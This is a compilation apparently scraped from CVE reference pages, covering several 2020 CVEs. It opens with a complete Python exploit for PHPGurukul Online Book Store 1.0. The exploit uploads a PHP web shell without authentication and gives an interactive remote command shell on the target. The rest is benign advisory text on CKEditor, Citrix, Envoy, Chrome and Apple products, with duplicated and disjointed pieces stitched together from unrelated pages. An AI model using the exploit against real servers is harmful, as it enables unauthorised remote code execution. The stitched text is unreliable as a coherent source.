An unauthenticated file upload vulnerability has been identified in admin_add.php in PHPGurukul Online Book Store 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.

    # Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
    # Google Dork: N/A
    # Date: 2020-01-07
    # Exploit Author: Tib3rius
    # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
    # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
    # Version: 1.0
    # Tested on: Ubuntu 16.04
    # CVE: N/A
    
    import argparse
    import random
    import requests
    import string
    import sys
    
    parser = argparse.ArgumentParser()
    parser.add_argument('url', action='store', help='The URL of the target.')
    args = parser.parse_args()
    
    url = args.url.rstrip('/')
    random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
    
    payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
    
    file = {'image': (random_file + '.php', payload, 'text/php')}
    print('> Attempting to upload PHP web shell...')
    r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
    print('> Verifying shell upload...')
    r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
    
    if random_file in r.text:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
        print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
        launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
        if launch_shell.lower() == 'y':
            while True:
                cmd = str(input('RCE $ '))
                if cmd == 'exit':
                    sys.exit(0)
                r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
                print(r.text)
    else:
        if r.status_code == 200:
            print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
        else:
            print('> Web shell failed to upload! The web server may not have write permissions.')

CVE-2020-10224: OffSec’s Exploit Database Archive

A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).

**CKEditor 4 - Smart WYSIWYG HTML editor **

  

 

A highly configurable WYSIWYG HTML editor with hundreds of features, from creating rich text content with captioned images, videos, tables, media embeds, emoji or mentions to pasting from Word and Google Docs and drag&drop image upload.

Supports a broad range of browsers, including legacy ones.

**Getting started****Using npm package**

npm install --save ckeditor

Use it on your website:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="./node\_modules/ckeditor/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Using CDN**

Load the CKEditor 4 script from CDN:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="https://cdn.ckeditor.com/4.13.0/standard/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Integrating with Angular, React and Vue.js**

Refer to official usage guides for the ckeditor4-angular, ckeditor4-react and ckeditor4-vue packages.

**Manual download**

Visit the CKEditor 4 download section on the CKEditor website to download ready-to-use CKEditor 4 packages or to create a customized CKEditor 4 build.

**Features**

*   Over 500 plugins in the Add-ons Repository.
*   Pasting from Microsoft Word, Excel and Google Docs.
*   Drag&drop image uploads.
*   Media embeds to insert videos, tweets, maps, slideshows.
*   Powerful clipboard integration.
*   Content quality control with Advanced Content Filter.
*   Extensible widget system.
*   Custom table selection.
*   Accessibility conforming to WCAG and Section 508.
*   Over 70 localizations available with full RTL support.

**Browser support**

  
IE / Edge

  
Firefox

  
Chrome

  
Chrome (Android)

  
Safari

  
iOS Safari

  
Opera

IE8, IE9, IE10, IE11, Edge

latest version

latest version

latest version

latest version

latest version

latest version

Find out more in the Browser Compatibility guide.

**Working with the ckeditor4 repository**

**Attention**: The code in this repository should be used locally and for development purposes only. We do not recommend using it in a production environment because the user experience will be very limited.

**Code installation**

There is no special installation procedure to install the development code. Simply clone it to any local directory and you are set.

**Available branches**

This repository contains the following branches:

*   **master** – Development of the upcoming minor release.
*   **stable** – Latest stable release tag point (non-beta).
*   **latest** – Latest release tag point (including betas).
*   **release/A.B.x** (e.g. 4.0.x, 4.1.x) – Release freeze, tests and tagging. Hotfixing.

Note that the master branch is under heavy development. Its code did not pass the release testing phase, though, so it may be unstable.

Additionally, all releases have their respective tags in the following form: 4.4.0, 4.4.1, etc.

**Samples**

The samples/ folder contains some examples that can be used to test your installation. Visit CKEditor 4 Examples for plenty of samples showcasing numerous editor features, with source code readily available to view, copy and use in your own solution.

**Code structure**

The development code contains the following main elements:

*   Main coding folders:
    *   core/ – The core API of CKEditor 4. Alone, it does nothing, but it provides the entire JavaScript API that makes the magic happen.
    *   plugins/ – Contains most of the plugins maintained by the CKEditor 4 core team.
    *   skin/ – Contains the official default skin of CKEditor 4.
    *   dev/ – Contains some developer tools.
    *   tests/ – Contains the CKEditor 4 tests suite.

**Building a release**

A release-optimized version of the development code can be easily created locally. The dev/builder/build.sh script can be used for that purpose:

A "release-ready" working copy of your development code will be built in the new dev/builder/release/ folder. An Internet connection is necessary to run the builder, for the first time at least.

**Testing environment**

Read more on how to set up the environment and execute tests in the CKEditor 4 Testing Environment guide.

**Reporting issues**

Use the CKEditor 4 GitHub issue page to report bugs and feature requests.

**License**

Copyright (c) 2003-2022, CKSource Holding sp. z o.o. All rights reserved.

For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license

CVE-2020-9281: GitHub - ckeditor/ckeditor4: The best enterprise-grade WYSIWYG editor. Fully customizable with countless features and plugins.

**CKEditor 4 - Smart WYSIWYG HTML editor ![Tweet](https://camo.githubusercontent.com/90bc908826728c0e4261acfff5619fd732c7be2b2a00624fce6363c9a3623c90/68747470733a2f2f696d672e736869656c64732e696f2f747769747465722f75726c2f687474702f736869656c64732e696f2e7376673f7374796c653d736f6369616c)**

![npm version](https://camo.githubusercontent.com/a74916224d8c5c854c559dcd1473956a555f6bd2e5ed451687f47c1048c97ba2/68747470733a2f2f62616467652e667572792e696f2f6a732f636b656469746f72342e737667) ![GitHub tag](https://camo.githubusercontent.com/aeb2fade617177883af4eb69556739a55ef9ea63047515629147f3db52ce45a8/68747470733a2f2f696d672e736869656c64732e696f2f6769746875622f7461672f636b656469746f722f636b656469746f72342e737667)

![Build Status](https://camo.githubusercontent.com/68bdce6bfea947fd5b288ffa3953f6fbd88e2ef36d8b1061d11c71fe578704e4/68747470733a2f2f7472617669732d63692e6f72672f636b656469746f722f636b656469746f72342e7376673f6272616e63683d6d616a6f72) ![Dependencies](https://camo.githubusercontent.com/f2d524f4247996fe44d79bf3b8449f2fbdc8a4e6260ed8421884a62eb047d30a/68747470733a2f2f696d672e736869656c64732e696f2f64617669642f636b656469746f722f636b656469746f72342e737667) ![Dev dependencies](https://camo.githubusercontent.com/69284efef3b867d41971966ba2d4c50a9bc417754e9d4d4b6860c72fed9d64b7/68747470733a2f2f696d672e736869656c64732e696f2f64617669642f6465762f636b656469746f722f636b656469746f72342e737667)

![Join newsletter](https://camo.githubusercontent.com/01ff6ce05d0f19075844501a25eb14637df998b74094c49c5b67c36dfe76733e/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f6a6f696e2d6e6577736c65747465722d3030636339392e737667) ![Follow Twitter](https://camo.githubusercontent.com/c2e5acc723d61e54643c7a8b4199b07b201013cb069885d5f2a59abea728279c/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f666f6c6c6f772d747769747465722d3030636339392e737667)

A highly configurable WYSIWYG HTML editor with hundreds of features, from creating rich text content with captioned images, videos, tables, media embeds, emoji or mentions to pasting from Word and Google Docs and drag&drop image upload.

Supports a broad range of browsers, including legacy ones.

![CKEditor 4 screenshot](https://camo.githubusercontent.com/e8c69044950a03abb60e297378e3c0a465aafdf07d6504263bc65143e2f7fe16/68747470733a2f2f632e636b736f757263652e636f6d2f612f312f696d672f6e706d2f636b656469746f72342e706e67)

**Getting started****Using npm package**

npm install --save ckeditor

Use it on your website:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="./node\_modules/ckeditor/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Using CDN**

Load the CKEditor 4 script from CDN:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="https://cdn.ckeditor.com/4.13.0/standard/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Integrating with Angular, React and Vue.js**

Refer to official usage guides for the `ckeditor4-angular`, `ckeditor4-react` and `ckeditor4-vue` packages.

**Manual download**

Visit the CKEditor 4 download section on the CKEditor website to download ready-to-use CKEditor 4 packages or to create a customized CKEditor 4 build.

**Features**

*   Over 500 plugins in the Add-ons Repository.
*   Pasting from Microsoft Word, Excel and Google Docs.
*   Drag&drop image uploads.
*   Media embeds to insert videos, tweets, maps, slideshows.
*   Powerful clipboard integration.
*   Content quality control with Advanced Content Filter.
*   Extensible widget system.
*   Custom table selection.
*   Accessibility conforming to WCAG and Section 508.
*   Over 70 localizations available with full RTL support.

**Browser support**

![IE / Edge](https://raw.githubusercontent.com/alrra/browser-logos/master/src/edge/edge_48x48.png)  
IE / Edge

![Firefox](https://raw.githubusercontent.com/alrra/browser-logos/master/src/firefox/firefox_48x48.png)  
Firefox

![Chrome](https://raw.githubusercontent.com/alrra/browser-logos/master/src/chrome/chrome_48x48.png)  
Chrome

![Chrome](https://raw.githubusercontent.com/alrra/browser-logos/master/src/chrome/chrome_48x48.png)  
Chrome (Android)

![Safari](https://raw.githubusercontent.com/alrra/browser-logos/master/src/safari/safari_48x48.png)  
Safari

![iOS Safari](https://raw.githubusercontent.com/alrra/browser-logos/master/src/safari-ios/safari-ios_48x48.png)  
iOS Safari

![Opera](https://raw.githubusercontent.com/alrra/browser-logos/master/src/opera/opera_48x48.png)  
Opera

IE8, IE9, IE10, IE11, Edge

latest version

latest version

latest version

latest version

latest version

latest version

Find out more in the Browser Compatibility guide.

**Working with the `ckeditor4` repostiory**

**Attention**: The code in this repository should be used locally and for development purposes only. We do not recommend using it in a production environment because the user experience will be very limited.

**Code installation**

There is no special installation procedure to install the development code. Simply clone it to any local directory and you are set.

**Available branches**

This repository contains the following branches:

*   **`master`** – Development of the upcoming minor release.
*   **`major`** – Development of the upcoming major release.
*   **`stable`** – Latest stable release tag point (non-beta).
*   **`latest`** – Latest release tag point (including betas).
*   **`release/A.B.x`** (e.g. `4.0.x`, `4.1.x`) – Release freeze, tests and tagging. Hotfixing.

Note that both `master` and `major` are under heavy development. Their code did not pass the release testing phase, though, so it may be unstable.

Additionally, all releases have their respective tags in the following form: `4.4.0`, `4.4.1`, etc.

**Samples**

The `samples/` folder contains some examples that can be used to test your installation. Visit CKEditor 4 Examples for plenty of samples showcasing numerous editor features, with source code readily available to view, copy and use in your own solution.

**Code structure**

The development code contains the following main elements:

*   Main coding folders:
    *   `core/` – The core API of CKEditor 4. Alone, it does nothing, but it provides the entire JavaScript API that makes the magic happen.
    *   `plugins/` – Contains most of the plugins maintained by the CKEditor 4 core team.
    *   `skin/` – Contains the official default skin of CKEditor 4.
    *   `dev/` – Contains some developer tools.
    *   `tests/` – Contains the CKEditor 4 tests suite.

**Building a release**

A release-optimized version of the development code can be easily created locally. The `dev/builder/build.sh` script can be used for that purpose:

A "release-ready" working copy of your development code will be built in the new `dev/builder/release/` folder. An Internet connection is necessary to run the builder, for the first time at least.

**Testing environment**

Read more on how to set up the environment and execute tests in the CKEditor 4 Testing Environment guide.

**Reporting issues**

Use the CKEditor 4 GitHub issue page to report bugs and feature requests.

**License**

Copyright (c) 2003-2021, CKSource - Frederico Knabben. All rights reserved.

For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license

** DISPUTED ** Citrix Gateway 11.1, 12.0, and 12.1 allows Information Exposure Through Caching. NOTE: Citrix disputes this as not a vulnerability. There is no sensitive information disclosure through the cache headers on Citrix ADC. The "Via" header lists cache protocols and recipients between the start and end points for a request or a response. The "Age" header provides the age of the cached response in seconds. Both headers are commonly used for proxy cache and the information is not sensitive.

Welcome to the Citrix Knowledge Center. Our site does not support outdated browser (or earlier) versions. To use our site, please take one of the following actions:

*   Upgrade your version of Internet Explorer. You can find more information here
*   Install the Google Chrome browser. You can find information here
*   Install the Firefox browser. You can find information here

Thank you,

The Citrix Knowledge Services Team

CVE-2020-10110: Search

CNCF Envoy through 1.13.0 may consume excessive amounts of memory when responding internally to pipelined requests.

**Vulnerability type**

CWE-400: Uncontrolled Resource Consumption

**Attack type**

Remote

**Impact**

Denial-of-service, Resource consumption (memory)

**Affected component(s)**

HTTP/1 codec

**Attack vector(s)**

A TCP buffer with many pipelined HTTP requests

**Discoverer(s)/Credits**

Alyssa Wilk (Google LLC)

**Description (full; not included in CVE but will be published on GitHub later and linked)**

Envoy version 1.13.0 or earlier may consume excessive amounts of memory when responding internally to pipelined requests. In the case of illegally formed requests, Envoy sends an internally generated 400 error, which is sent to the Network::Connection buffer. If the client reads these responses slowly, it is possible to build up a large number of responses, and consume functionally unlimited memory. This bypasses Envoy’s overload manager, which will itself send an internally generated response when Envoy approaches configured memory thresholds, exacerbating the problem.

CVE-2020-8661

CNCF Envoy through 1.13.0 may consume excessive amounts of memory when proxying HTTP/1.1 requests or responses with many small (i.e. 1 byte) chunks.

**Vulnerability type**

CWE-400: Uncontrolled Resource Consumption

**Attack type**

Remote

**Impact**

Denial-of-service, Resource consumption (memory)

**Affected component(s)**

HTTP/1 codec, Connection buffer

**Attack vector(s)**

A HTTP/1.1 request or response with many small (i.e. 1 byte) chunks.

**Discoverer(s)/Credits**

Wenlei (Frank) He (Google LLC)

**Description (full; not included in CVE but will be published on GitHub later and linked)**

Envoy version 1.13.0 or earlier may consume excessive amounts of memory when proxying HTTP/1.1 requests or responses with many small (i.e. 1 byte) chunks. Envoy allocates a separate buffer fragment for each incoming or outgoing chunk with the size rounded to the nearest 4Kb and does not release empty chunks after committing data. As such processing requests or responses with a lot of small chunks may result in extremely high memory overhead while proxying. The memory overhead could be two to three orders of magnitude more than configured buffer limits.

CVE-2020-8659

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

CVE-2020-9757: craft-seomatic/CHANGELOG.md at v3 · nystudio107/craft-seomatic

Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

About Monorail User Guide Release Notes Feedback on Monorail Terms Privacy

CVE-2020-6418: 1053604 - chromium - An open-source project to help move the web forward.

Type confusion in V8 in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2020-6383: Stable Channel Update for Desktop

An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.

Released May 20, 2020

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9789: Wenchao Li of VARAS@IIE

CVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3878: Samuel Groß of Google Project Zero

**SQLite**

Available for: Windows 7 and later

Impact: A malicious application may cause a denial of service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9794

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9805: an anonymous researcher

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9802: Samuel Groß of Google Project Zero

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

CVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9806: Wen Xu of SSLab at Georgia Tech

CVE-2020-9807: Wen Xu of SSLab at Georgia Tech

**WebKit**

Available for: Windows 7 and later

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9850: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-9843: Ryan Pickren (ryanpickren.com)

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9803: Wen Xu of SSLab at Georgia Tech

Tag

#google